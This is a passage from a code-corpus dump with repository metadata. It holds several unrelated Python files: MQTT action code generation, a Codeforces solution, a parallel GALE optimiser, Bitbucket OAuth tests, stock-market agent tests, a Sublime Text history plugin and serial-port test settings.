    "mqtt.publish", MQTTPublishAction, MQTT_PUBLISH_ACTION_SCHEMA
)
async def mqtt_publish_action_to_code(config, action_id, template_arg, args):
    """Build the `mqtt.publish` action, resolving the templatable options."""
    parent = await cg.get_variable(config[CONF_ID])
    action = cg.new_Pvariable(action_id, template_arg, parent)
    topic = await cg.templatable(config[CONF_TOPIC], args, cg.std_string)
    cg.add(action.set_topic(topic))
    payload = await cg.templatable(config[CONF_PAYLOAD], args, cg.std_string)
    cg.add(action.set_payload(payload))
    qos = await cg.templatable(config[CONF_QOS], args, cg.uint8)
    cg.add(action.set_qos(qos))
    retain = await cg.templatable(config[CONF_RETAIN], args, bool)
    cg.add(action.set_retain(retain))
    return action
# Options for the `mqtt.publish_json` action; here the payload is a lambda
# that fills a JSON root object rather than a templatable string.
MQTT_PUBLISH_JSON_ACTION_SCHEMA = cv.Schema(
    {
        cv.GenerateID(): cv.use_id(MQTTClientComponent),
        cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
        cv.Required(CONF_PAYLOAD): cv.lambda_,
        cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
        cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
    }
)
@automation.register_action(
    "mqtt.publish_json", MQTTPublishJsonAction, MQTT_PUBLISH_JSON_ACTION_SCHEMA
)
async def mqtt_publish_json_action_to_code(config, action_id, template_arg, args):
    """Build the `mqtt.publish_json` action; the payload lambda receives an
    extra JsonObject argument named `root` to fill in."""
    paren = await cg.get_variable(config[CONF_ID])
    var = cg.new_Pvariable(action_id, template_arg, paren)
    template_ = await cg.templatable(config[CONF_TOPIC], args, cg.std_string)
    cg.add(var.set_topic(template_))
    # The payload lambda gets the automation args plus the JSON root object.
    args_ = args + [(cg.JsonObject, "root")]
    lambda_ = await cg.process_lambda(config[CONF_PAYLOAD], args_, return_type=cg.void)
    cg.add(var.set_payload(lambda_))
    template_ = await cg.templatable(config[CONF_QOS], args, cg.uint8)
    cg.add(var.set_qos(template_))
    template_ = await cg.templatable(config[CONF_RETAIN], args, bool)
    cg.add(var.set_retain(template_))
    return var
def get_default_topic_for(data, component_type, name, suffix):
    """Derive the default MQTT topic for a component.

    The entity *name* is lowercased, spaces become underscores, and any
    character outside [a-zA-Z0-9_-] is dropped.
    """
    allowed = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")
    normalized = name.lower().replace(" ", "_")
    sanitized_name = "".join(ch for ch in normalized if ch in allowed)
    return f"{data.topic_prefix}/{component_type}/{sanitized_name}/{suffix}"
async def register_mqtt_component(var, config):
    """Register *var* as a component and apply the common per-entity MQTT
    options: retain, discovery opt-out, custom topics and availability."""
    await cg.register_component(var, {})
    if CONF_RETAIN in config:
        cg.add(var.set_retain(config[CONF_RETAIN]))
    if not config.get(CONF_DISCOVERY, True):
        cg.add(var.disable_discovery())
    if CONF_STATE_TOPIC in config:
        cg.add(var.set_custom_state_topic(config[CONF_STATE_TOPIC]))
    if CONF_COMMAND_TOPIC in config:
        cg.add(var.set_custom_command_topic(config[CONF_COMMAND_TOPIC]))
    if CONF_COMMAND_RETAIN in config:
        cg.add(var.set_command_retain(config[CONF_COMMAND_RETAIN]))
    if CONF_AVAILABILITY in config:
        availability = config[CONF_AVAILABILITY]
        # A falsy availability config explicitly disables availability
        # reporting for this entity.
        if not availability:
            cg.add(var.disable_availability())
        else:
            cg.add(
                var.set_availability(
                    availability[CONF_TOPIC],
                    availability[CONF_PAYLOAD_AVAILABLE],
                    availability[CONF_PAYLOAD_NOT_AVAILABLE],
                )
            )
@automation.register_condition(
    "mqtt.connected",
    MQTTConnectedCondition,
    cv.Schema(
        {
            cv.GenerateID(): cv.use_id(MQTTClientComponent),
        }
    ),
)
async def mqtt_connected_to_code(config, condition_id, template_arg, args):
    """Build the `mqtt.connected` condition bound to the client component."""
    paren = await cg.get_variable(config[CONF_ID])
    return cg.new_Pvariable(condition_id, template_arg, paren)
| 9,009 | 0 | 226 |
a1aa629cae29520de03a214cd3415b0e7fc05606 | 456 | py | Python | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | 4 | 2021-06-14T10:44:28.000Z | 2021-06-26T05:29:07.000Z | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | null | null | null | intermediate problems/Algorithmic Complexity/Wrath.py | doanthinhvo/Codeforces-Solutions-in-Python | 92686f3234202ef1049e14c078dcc29b1d5ac225 | [
"MIT"
] | 2 | 2021-06-22T12:47:53.000Z | 2021-06-26T05:29:09.000Z | n = int(input())
a = list(map(int, input().split()))
count = 0
j = n - 1
#j is the left boundary already reached by later people's hits: it prevents counting a victim twice.
#j must always stay <= i, because person i can only hit people standing to their left.
#last_kill_pos is where the current person's reach ends (their leftmost possible victim).
for i in range(n - 1, -1 , -1):
j = min(i, j)
last_kill_pos = max(0, i - a[i])
if j > last_kill_pos:
count += (j - last_kill_pos)
j = last_kill_pos
print(n - count)
| 22.8 | 74 | 0.627193 | n = int(input())
a = list(map(int, input().split()))
count = 0
j = n - 1
#j is the left boundary already reached by later people's hits: it prevents counting a victim twice.
#j must always stay <= i, because person i can only hit people standing to their left.
#last_kill_pos is where the current person's reach ends (their leftmost possible victim).
for i in range(n - 1, -1 , -1):
j = min(i, j)
last_kill_pos = max(0, i - a[i])
if j > last_kill_pos:
count += (j - last_kill_pos)
j = last_kill_pos
print(n - count)
| 0 | 0 | 0 |
3df08c48b4543e016839229685c6a766d7e87508 | 4,233 | py | Python | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | null | null | null | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | 9 | 2015-09-14T21:07:06.000Z | 2015-12-08T01:38:08.000Z | multiProc/src/parGALE.py | rahlk/Experimental-Algorithms | d04a2d3ec5a4c54ff3ebff5cf003b93d2a983061 | [
"MIT"
] | null | null | null | """
"""
from __future__ import print_function, division
import os
from demo import *
import subprocess
import sys
sys.path.append(os.path.abspath('../problems/'))
# Get the git root directory
root=repo_dir = subprocess.Popen(['git'
,'rev-parse'
, '--show-toplevel']
, stdout=subprocess.PIPE
).communicate()[0].rstrip()
sys.path.append(root)
from pdb import set_trace
from dtlz2 import DTLZ2
from multiprocessing import Pool
from random import seed as rseed, randint as randi
import numpy as np
from time import time
from tools.quality import measure
def gale0(model=DTLZ2(n_dec=30,n_obj=3), new=[], pop=int(1e4)):
    """
    Recursive FASTMAP clustering.
    """
    # NOTE(review): this copy references recurse/distant/cdom/mutate, none of
    # which are defined in this excerpt -- the nested helper definitions
    # appear to have been stripped; calling this as-is raises NameError.
    # NOTE(review): both defaults are evaluated once at import time (shared
    # DTLZ2 instance, mutable `new=[]`); `new=None` would be the safer idiom.
    if len(new)==0:
        frontier = model.generate(pop)
    else:
        frontier=new
        frontier.extend(model.generate(pop-len(new)))
    N = np.shape(frontier)[0]
    leaf = []
    norm = np.max(frontier, axis=0) - np.min(frontier, axis=0)
    recurse(frontier)
    a,b=distant(leaf)
    (good, bad) = (a,b) if cdom(model.solve(a), model.solve(b)) else (b,a)
    new=mutate(leaf,good,g=0.5)
    return new
def GALE2(n_proc=10,frontSize=100,iters=1000,model=DTLZ2(n_dec=30, n_obj=3)):
    """
    WHY do threads take more time than single processors?? FIX THIS!!!
    :param n_proc:
    :param frontSize:
    :param iters:
    :param model:
    :return:
    """
    t = time()
    collect=[]
    final = []
    popSize = [int(frontSize/n_proc)]*n_proc
    # initpop = [(model, model.generate(1000), 1000) for _ in xrange(n_proc)]
    p=Pool(processes=n_proc)
    # Fan one gale0 run out to each worker, merge the survivors, then
    # condense them with a final sequential gale0 pass.
    collect.extend(p.map(gale2, popSize))
    for cc in collect: final.extend(cc)
    # set_trace()
    ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
    print('Time Taken: ', time()-t)
    return ret
if __name__=="__main__":
eval(cmd()) | 27.666667 | 77 | 0.616584 | """
"""
from __future__ import print_function, division
import os
from demo import *
import subprocess
import sys
sys.path.append(os.path.abspath('../problems/'))
# Get the git root directory
root=repo_dir = subprocess.Popen(['git'
,'rev-parse'
, '--show-toplevel']
, stdout=subprocess.PIPE
).communicate()[0].rstrip()
sys.path.append(root)
from pdb import set_trace
from dtlz2 import DTLZ2
from multiprocessing import Pool
from random import seed as rseed, randint as randi
import numpy as np
from time import time
from tools.quality import measure
def gale0(model=DTLZ2(n_dec=30,n_obj=3), new=[], pop=int(1e4)):
    """
    Recursive FASTMAP clustering.
    """
    # NOTE(review): both defaults are evaluated once at import time -- the
    # DTLZ2 instance is shared across calls, and `new=[]` is a mutable
    # default (harmless here because the empty default is never mutated, but
    # `new=None` would be the safer idiom).
    if len(new)==0:
        frontier = model.generate(pop)
    else:
        frontier=new
        frontier.extend(model.generate(pop-len(new)))
    N = np.shape(frontier)[0]
    leaf = []  # filled by recurse() with the surviving cluster
    norm = np.max(frontier, axis=0) - np.min(frontier, axis=0)
    def cdom(x, y, better=['less','less','less']):
        # Continuous domination: x dominates y if x has the smaller
        # aggregated exponential loss over the objective values.
        def loss1(i,x,y):
            return (x - y) if better[i] == 'less' else (y - x)
        def expLoss(i,x,y,n):
            return np.exp(loss1(i,x,y) / n)
        def loss(x, y):
            n = min(len(x), len(y)) #lengths should be equal
            losses = [expLoss(i,xi,yi,n) for i, (xi, yi) in enumerate(zip(x,y))]
            return sum(losses)/n
        "x dominates y if it losses least"
        return loss(x,y) < loss(y,x)
    def distant(lst):
        # Approximate the two most distant points (FASTMAP pivot heuristic:
        # start from a random point, walk to its farthest, then farthest again).
        R, C = np.shape(lst)
        farthest=lambda one,rest: sorted(rest, key=lambda F: aDist(F,one))[-1]
        one=lst[randi(0,R-1)]
        mid=farthest(one, lst)
        two=farthest(mid, lst)
        return one, two
    def mutate(lst,good,g=0.15):
        # Pull every candidate a fraction g of the way towards `good`.
        new=[]
        for l in lst:
            new.append([a+(b-a)*g for a,b in zip(l,good)])
        return new
    def aDist(one, two):
        # Euclidean distance on decision vectors, normalised per dimension.
        return np.sqrt(np.sum((np.array(one)/norm-np.array(two)/norm)**2))
    def recurse(dataset):
        R, C = np.shape(dataset) # No. of Rows and Col
        # Find the two most distance points.
        one, two = distant(dataset)
        # Project each case on
        def proj(test):
            a = aDist(one, test)
            b = aDist(two, test)
            c = aDist(one, two)
            return (a**2-b**2+c**2)/(2*c)
        if R<np.sqrt(N):
            leaf.extend(dataset)
        else:
            # Recurse into the half nearer the dominating pole.
            half1 = cdom(model.solve(one), model.solve(two))
            if half1:
                _ = recurse(sorted(dataset,key=lambda F:proj(F))[:int(R/2)])
            else:
                _ = recurse(sorted(dataset,key=lambda F:proj(F))[int(R/2):])
    recurse(frontier)
    a,b=distant(leaf)
    (good, bad) = (a,b) if cdom(model.solve(a), model.solve(b)) else (b,a)
    new=mutate(leaf,good,g=0.5)
    return new
def gale1(iter=1000,pop=1600,model=DTLZ2(n_dec=30, n_obj=3)):
    # Run gale0 repeatedly, feeding each generation's survivors back in.
    # NOTE(review): `iter` shadows the builtin, and n_proc is derived from a
    # hard-coded total budget of 1000 -- for iter > 1000 this truncates to 0
    # and would divide by zero below; confirm intended usage.
    n_proc = int(1000.00/iter)
    new = gale0(model,new=[],pop=int(pop/n_proc))
    while iter:
        iter-=1
        new=gale0(model, new, pop=int(pop/n_proc))
    return new
def gale2(pop):
    # Single-argument wrapper so Pool.map can dispatch gale0 runs.
    model = DTLZ2(n_dec=30,n_obj=3)
    # set_trace()
    # NOTE(review): `pop` only sizes the seed population passed via `new`;
    # gale0's own `pop` keeps its 1e4 default -- confirm this is intended.
    return gale0(new=model.generate(pop))
def GALE2(n_proc=10,frontSize=100,iters=1000,model=DTLZ2(n_dec=30, n_obj=3)):
    """
    WHY do threads take more time than single processors?? FIX THIS!!!
    :param n_proc:
    :param frontSize:
    :param iters:
    :param model:
    :return:
    """
    t = time()
    collect=[]
    final = []
    popSize = [int(frontSize/n_proc)]*n_proc
    # initpop = [(model, model.generate(1000), 1000) for _ in xrange(n_proc)]
    p=Pool(processes=n_proc)
    # Fan one gale0 run out to each worker, merge the survivors, then
    # condense them with a final sequential gale0 pass.
    collect.extend(p.map(gale2, popSize))
    for cc in collect: final.extend(cc)
    # set_trace()
    ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
    print('Time Taken: ', time()-t)
    return ret
def GALE(n_proc=10,frontSize=100,iters=100):
    # Parallel GALE: each worker runs gale1 for iters/n_proc iterations, the
    # merged survivors are condensed by a final gale0 pass, and convergence
    # of the resulting front is reported.
    t = time()
    collect=[]
    final = []
    per = [iters/n_proc]*n_proc
    popSize = [frontSize/n_proc]*n_proc
    # NOTE(review): popSize is computed but never used in this function.
    p=Pool(processes=n_proc)
    collect.extend(p.map(gale1, per))
    for cc in collect: final.extend(cc)
    ret = gale0(model=DTLZ2(n_dec=30, n_obj=3),new=final,pop=len(final))
    print('Time Taken: ', time()-t)
    # true = DTLZ2(n_dec=30, n_obj=3).get_pareto()
    m = measure(model=DTLZ2(n_dec=30, n_obj=3))
    conv = m.convergence(ret)
    print("Convergence:",conv)
    # set_trace()
    return
# NOTE(review): eval() on the demo-supplied cmd() output executes arbitrary
# command-line text -- acceptable for a research script, unsafe elsewhere.
if __name__=="__main__":
    eval(cmd())
72ff83346d8d3330659ad8dff6135283c056fe91 | 2,441 | py | Python | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 4 | 2019-09-17T08:10:57.000Z | 2020-09-03T21:27:21.000Z | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 2 | 2017-05-02T18:44:55.000Z | 2017-10-06T15:11:23.000Z | oauthenticator/tests/test_bitbucket.py | jeff-sternberg/oauthenticator | 158eb206dd2b59961442a4d3b67fbbb179a3030a | [
"BSD-3-Clause"
] | 4 | 2019-09-27T03:22:44.000Z | 2021-01-20T08:47:34.000Z | import os
from unittest.mock import patch
from pytest import fixture, mark
from ..bitbucket import BitbucketOAuthenticator
from .mocks import setup_oauth_mock
def user_model(username):
    """Return the minimal Bitbucket user payload for the given username."""
    return {
        'username': username,
    }
@fixture
| 29.409639 | 68 | 0.669398 | import os
from unittest.mock import patch
from pytest import fixture, mark
from ..bitbucket import BitbucketOAuthenticator
from .mocks import setup_oauth_mock
def user_model(username):
    """Build the minimal user payload the mocked Bitbucket API returns."""
    return {'username': username}
@fixture
def bitbucket_client(client):
    """Fixture: wire the generic OAuth mock client to Bitbucket's hosts and
    token/user endpoint paths."""
    setup_oauth_mock(client,
                     host=['bitbucket.org', 'api.bitbucket.org'],
                     access_token_path='/site/oauth2/access_token',
                     user_path='/2.0/user',
                     )
    return client
async def test_bitbucket(bitbucket_client):
    """Happy path: a mocked login yields the username plus auth state."""
    authenticator = BitbucketOAuthenticator()
    handler = bitbucket_client.handler_for_user(user_model('yorba'))
    user_info = await authenticator.authenticate(handler)
    assert sorted(user_info) == ['auth_state', 'name']
    name = user_info['name']
    assert name == 'yorba'
    auth_state = user_info['auth_state']
    assert 'access_token' in auth_state
    assert 'bitbucket_user' in auth_state
async def test_team_whitelist(bitbucket_client):
    """Only members of a whitelisted Bitbucket team may authenticate."""
    client = bitbucket_client
    authenticator = BitbucketOAuthenticator()
    authenticator.bitbucket_team_whitelist = ['blue']
    teams = {
        'red': ['grif', 'simmons', 'donut', 'sarge', 'lopez'],
        'blue': ['tucker', 'caboose', 'burns', 'sheila', 'texas'],
    }
    def list_teams(request):
        # Mock of Bitbucket's /2.0/teams endpoint: resolve the username from
        # the bearer token, return the teams that user belongs to.
        token = request.headers['Authorization'].split(None, 1)[1]
        username = client.access_tokens[token]['username']
        values = []
        for team, members in teams.items():
            if username in members:
                values.append({'username': team})
        return {
            'values': values
        }
    client.hosts['api.bitbucket.org'].append(
        ('/2.0/teams', list_teams)
    )
    # caboose is on 'blue' (whitelisted); donut is on 'red' (rejected).
    handler = client.handler_for_user(user_model('caboose'))
    user_info = await authenticator.authenticate(handler)
    name = user_info['name']
    assert name == 'caboose'
    handler = client.handler_for_user(user_model('donut'))
    name = await authenticator.authenticate(handler)
    assert name is None
    # reverse it, just to be safe
    authenticator.team_whitelist = ['red']
    handler = client.handler_for_user(user_model('caboose'))
    name = await authenticator.authenticate(handler)
    assert name is None
    handler = client.handler_for_user(user_model('donut'))
    user_info = await authenticator.authenticate(handler)
    name = user_info['name']
    assert name == 'donut'
| 2,092 | 0 | 68 |
614f2ffc9bfb0c9d3e4e2692c37311ee02f72bbd | 2,429 | py | Python | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 15 | 2018-06-10T13:08:47.000Z | 2022-01-19T05:55:01.000Z | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 45 | 2017-01-26T10:54:40.000Z | 2017-09-12T14:23:01.000Z | stockmarket/tests/test_switchingstrategies.py | lbolla/Agent-Based-Stock-Market-Model | 6ff9549b2082371778632f4ad23a12f42c24cccd | [
"MIT"
] | 5 | 2018-11-04T17:49:58.000Z | 2021-12-23T03:09:36.000Z | import pytest
from stockmarket.agent import Trader
from stockmarket.switchingstrategies import *
from stockmarket.valuationfunctions import *
from numpy.testing import assert_equal
from numpy.testing import assert_raises
@pytest.fixture()
| 63.921053 | 120 | 0.70317 | import pytest
from stockmarket.agent import Trader
from stockmarket.switchingstrategies import *
from stockmarket.valuationfunctions import *
from numpy.testing import assert_equal
from numpy.testing import assert_raises
@pytest.fixture()
def agents():
return [Trader(name="Agent1", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=lambda **x: extrapolate_average_profit(**x), propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1),
Trader(name="Agent2", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=lambda **x: extrapolate_ma_price(**x), propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1),
Trader(name="WeirdAgent", money=1000, bid_ask_spread=0, ma_short=2, ma_long=3,
valuation_function=None, propensity_to_switch=1.1,
price_to_earnings_window=(6, 12), trader_volume_risk_aversion=0.1)]
def test_adaptive_switching(agents):
# a none chartist and non fundamentalist agent should raise a value error
assert_raises(ValueError, adaptive_switching, agents[-1], 1.1, 0.04, 0.03)
# the fundamentalist agent does not switch strategy if it did not mis any returns
# assert_equal(adaptive_switching(agent=agents[0], propensity_to_switch=0.3, realised_returns=0.04,
# possibly_realised_returns=0.03), agents[0].function)
# the chartist agent does not switch strategy if it did not miss any returns
# assert_equal(adaptive_switching(agent=agents[1], propensity_to_switch=0.3, realised_returns=0.04,
# possibly_realised_returns=0.03), agents[1].function)
# the fund agent switches strategies for sure as possibly realised returns are 100% bigger than realised returns
# assert_equal(adaptive_switching(agent=agents[0], propensity_to_switch=2, realised_returns=0,
# possibly_realised_returns=1), agents[1].function)
# the chartist agent switches strategies for sure as possibly realised returns are 100% bigger than realised returns
# assert_equal(adaptive_switching(agent=agents[1], propensity_to_switch=2, realised_returns=0,
# possibly_realised_returns=1), agents[0].function) | 2,142 | 0 | 45 |
92f64bf7bd58edbbd33babc4dc0d18c33704d313 | 2,823 | py | Python | pmi/pmi_odds.py | rogersprates/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | 2 | 2018-11-16T13:44:24.000Z | 2021-09-23T23:54:34.000Z | pmi/pmi_odds.py | dimiiako/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | null | null | null | pmi/pmi_odds.py | dimiiako/word2vec-financial-sentiment | 42172b47dc0a5d228e473bd34d15a9aa59c43537 | [
"MIT"
] | 3 | 2017-04-12T07:00:23.000Z | 2021-11-27T03:43:33.000Z | """pmi_odds.py: computes the PMI (Pointwise mutual information) with odds
"""
import json
import os
from probabilities import pmi_odds
__author__ = "Edimar Manica"
| 33.607143 | 91 | 0.680482 | """pmi_odds.py: computes the PMI (Pointwise mutual information) with odds
"""
import json
import os
from probabilities import pmi_odds
__author__ = "Edimar Manica"
def create_vocabulary(news):
    """Return the set of distinct tokens across all news items.

    *news* maps an id to a record whose "text" field is a token list.
    """
    vocabulary = set()
    for item in news.values():
        # set.update is linear per item; the previous implementation rebuilt
        # the whole accumulator list on every iteration (quadratic
        # concatenation) before converting it to a set at the end.
        vocabulary.update(item["text"])
    return vocabulary
def frequencies(news, vocabulary):
    """Count, per class, in how many news items each vocabulary word occurs.

    Returns (pn, nn, positive_words, negative_words) where pn/nn are the
    number of positive/negative items and the dicts map every vocabulary
    word to its document frequency (as a float) within that class.
    """
    positive_words = dict.fromkeys(vocabulary, 0.0)
    negative_words = dict.fromkeys(vocabulary, 0.0)
    pn = 0  # number of POSITIVE news
    nn = 0  # number of NEGATIVE news
    for news_id in news:  # renamed from `id`, which shadowed the builtin
        if news[news_id]["label"] == "positive":
            pn += 1
            counts = positive_words
        else:
            nn += 1
            counts = negative_words
        # set() so a word repeated inside one item is counted only once.
        for w in set(news[news_id]["text"]):
            counts[w] += 1.0
    return pn, nn, positive_words, negative_words
def pmi_odd(path_input,path_output):
    """Read a labelled training set from *path_input*, score every vocabulary
    word with the odds-based PMI for each class, and write the ranked term
    lists as JSON to *path_output*."""
    with open(path_input, "r") as news_file:
        training_set = json.load(news_file)
    #print(training_set)
    vocabulary = create_vocabulary(training_set)
    #print(vocabulary)
    pn, nn, positive_words, negative_words = frequencies(training_set, vocabulary)
    #print (pn, nn, positive_words, negative_words)
    terms = {"positive":[], "negative":[]}
    for word in vocabulary:
        #print (word, pn, nn, positive_words[word], negative_words[word])
        positive_pmi = pmi_odds(positive_words[word], pn, negative_words[word], nn)
        terms["positive"].append((word, positive_pmi))
        negative_pmi = pmi_odds(negative_words[word], nn, positive_words[word], pn)
        terms["negative"].append((word, negative_pmi))
    # Most class-indicative (highest-scoring) terms first.
    terms["positive"].sort(key=lambda tup: tup[1], reverse=True)
    terms["negative"].sort(key=lambda tup: tup[1], reverse=True)
    with open(path_output, "w") as terms_file:
        json.dump(terms, terms_file)
def pmi_odds_daily():
    """Score the daily training sets (with and without duplicates)."""
    base = os.getcwd()
    # (training json, output terms json) pairs
    jobs = [
        (base + '/../files/training_with_duplicates.json',
         base + '/../files/terms03.json'),
        (base + '/../files/training_without_duplicates.json',
         base + '/../files/terms04.json'),
    ]
    for training_path, terms_path in jobs:
        pmi_odd(training_path, terms_path)
def pmi_odds_weekly():
    """Score the weekly training sets (with and without duplicates)."""
    base = os.getcwd()
    # (training json, output terms json) pairs
    jobs = [
        (base + '/../files2/weekly_with_duplicates_training.json',
         base + '/../files2/terms03.json'),
        (base + '/../files2/weekly_without_duplicates_training.json',
         base + '/../files2/terms04.json'),
    ]
    for training_path, terms_path in jobs:
        pmi_odd(training_path, terms_path)
| 2,536 | 0 | 115 |
407bdee7a7f86e022e7da89584d22b5150934f0d | 2,332 | py | Python | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 96 | 2015-01-06T17:37:21.000Z | 2022-02-14T11:14:11.000Z | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 50 | 2015-01-01T13:26:24.000Z | 2021-12-20T01:04:18.000Z | hist.py | lclutz/sublime-text-shell-command | 846e1d04c20fba7612d8073e8b1b19439f4ab559 | [
"MIT"
] | 27 | 2015-02-12T18:17:22.000Z | 2022-03-31T03:03:27.000Z | # NOTE(kaste): Take from https://github.com/randy3k/AlignTab
# Copyright (c) 2015 Randy Lai <randy.cs.lai@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sublime
import sublime_plugin
# Module-level singleton: only created when missing from the module globals,
# so the collected history survives Sublime Text plugin reloads.
if 'history' not in globals():
    history = History()
| 35.333333 | 87 | 0.691681 | # NOTE(kaste): Take from https://github.com/randy3k/AlignTab
# Copyright (c) 2015 Randy Lai <randy.cs.lai@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sublime
import sublime_plugin
class History:
    """Command-input history with a roll/browse cursor.

    Storage is intentionally class-level, so every instance (and the
    module-level singleton below) shares one history list.
    """

    hist = []    # entries, oldest first
    index = None  # current browse position, or None when not browsing

    def insert(self, user_input):
        """Record *user_input* and reset browsing.

        Skipped when it repeats the most recent entry or is the special
        "last_regex" token (convention inherited from AlignTab).
        """
        if not self.hist or (user_input != self.last() and user_input != "last_regex"):
            self.hist.append(user_input)
        self.index = None

    def roll(self, backwards=False):
        """Move the cursor one step through history, wrapping at either end."""
        if self.index is None:
            self.index = -1 if backwards else 0
        else:
            self.index += -1 if backwards else 1
            if self.index == len(self.hist) or self.index < -len(self.hist):
                self.index = -1 if backwards else 0

    def last(self):
        """Return the most recent entry, or None when history is empty."""
        return self.hist[-1] if self.hist else None

    def get(self, index=None):
        """Return the entry at *index*, defaulting to the cursor position.

        Bug fix: the previous `if not index` treated an explicit index of 0
        as "not given" and silently fell back to the cursor position.
        """
        if index is None:
            index = self.index
        return self.hist[index] if self.hist else None

    def reset_index(self):
        """Forget the browse position without touching the entries."""
        self.index = None
# Module-level singleton: only created when missing from the module globals,
# so the collected history survives Sublime Text plugin reloads.
if 'history' not in globals():
    history = History()
class ShellCommandHistory(sublime_plugin.TextCommand):
    # Text command: replace the whole view's contents (the command-input
    # panel) with the previous/next history entry.
    def run(self, edit, backwards=False):
        history.roll(backwards)
        self.view.erase(edit, sublime.Region(0, self.view.size()))
        self.view.insert(edit, 0, history.get())
| 796 | 192 | 72 |
f20ec0d8e0574b5719072252566350a189a75043 | 336 | py | Python | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 545 | 2016-11-29T18:04:48.000Z | 2022-03-28T09:31:06.000Z | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 1,644 | 2016-11-17T09:49:31.000Z | 2022-03-30T18:10:13.000Z | testtools/UART_interface/serial_settings.py | cbauer10/azure-iot-sdk-c | 2080c8b537f31b72b8668ba3bb8c6772da55d63a | [
"MIT"
] | 826 | 2016-11-16T16:05:16.000Z | 2022-03-18T19:23:22.000Z | baud_rate = 115200
port = "/dev/ttyACM1"
input_file=None
output_file='log.txt'
wait_for_flash = 10
bits_to_cache = 1600
mxchip_file = "/media/newt/AZ31665"
setup_string = "Setup complete"
skip_setup = False
mxchip_buf_pause = .06
serial_comm_timeout = 2
device_type = 'mxchip'
test_timeout = None
reset_device = False
tests_run = False
| 21 | 35 | 0.779762 | baud_rate = 115200
port = "/dev/ttyACM1"
input_file=None
output_file='log.txt'
wait_for_flash = 10
bits_to_cache = 1600
mxchip_file = "/media/newt/AZ31665"
setup_string = "Setup complete"
skip_setup = False
mxchip_buf_pause = .06
serial_comm_timeout = 2
device_type = 'mxchip'
test_timeout = None
reset_device = False
tests_run = False
| 0 | 0 | 0 |
